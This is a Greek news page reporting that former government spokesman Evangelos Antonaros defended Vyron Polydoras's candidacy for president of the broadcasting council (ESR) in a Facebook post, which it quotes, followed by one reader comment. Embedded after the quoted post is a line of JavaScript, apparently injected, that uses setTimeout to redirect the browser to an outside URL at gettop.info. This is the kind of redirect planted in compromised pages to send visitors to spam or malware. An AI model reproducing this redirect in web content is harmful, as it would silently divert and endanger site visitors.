Αντώναρος υπέρ Πολύδωρα: Είναι έντιμος και πατριώτης

1
19

 

Υπέρ του Βύρωνα Πολύδωρα για τη θέση του προέδρου του ΕΣΡ τοποθετείται ο Ευάγγελος Αντώναρος και το εκφράζει μέσα από τον λογαριασμό του στο Facebook.
Όπως έγραψε χαρακτηριστικά ο κυβερνητικός εκπρόσωπος της κυβέρνησης Καραμανλή:

Δεν εχω πρόθεση να μετασχω στη συζήτηση αν ειναι η δεν ειναι κατάλληλος για το ΕΣΡ ο φίλος Βύρων Πολυδωρας με τον οποίο γνωρίζομαι πολύ πριν μπω εγω στη πολιτική. Ξέρω όμως ότι η προσπάθεια απαξίωσης ενοε έντιμου ανθρώπου με μεγάλη πολιτική πείρα και βαθεια μόρφωση τον αδικεί καταφανέστατα. Πρόκειται για ένα πατριώτη με την πραγματική έννοια του όρου που δεν δίστασε ποτε νε πει τη γνώμη του. Προσωπικά τον τιμώ κι ας διαφωνώ μαζι του σε διάφορα πολιτικά θέματα. Κι όσοι προσπαθουν, ειδικά στα μέσα κοινωνικής δικτύωσης, να τον απαξιώσουν επικαλούμενοι αναληθώς ότι «πλησιαζει τα 80» θα πρεπει να ντρεπονται. Ο Βύρων δεν έχει κσν κλείσει τα 70. Ο τελευταιος προεδρος του ΕΣΡ τον όποιο δυστυχώς ανέχθηκαν όλες οι κυβερνήσεις απο το 2002 και μετα και του οποίου το όνομα προτιμώ να λησμονώ, ειχε πάρει τη θεση στα 68 κι εφυγε στα 82….για να ξέρουμε τι λέμε δηλαδή…

antonaros setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

1 ΣΧΟΛΙΟ

  1. Κατάντησε ληξιαρχείο ο απίθανος για να στηρίξει μια ανόητη επιλογή του Τσίπρα Μάλλον δεν είδε τη συνέντευξη του Πολύδωρα στην ΕΡΤ και λησμόνησε πολύ γρήγορα ποιος είναι ο πρώην σύντροφός του.

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here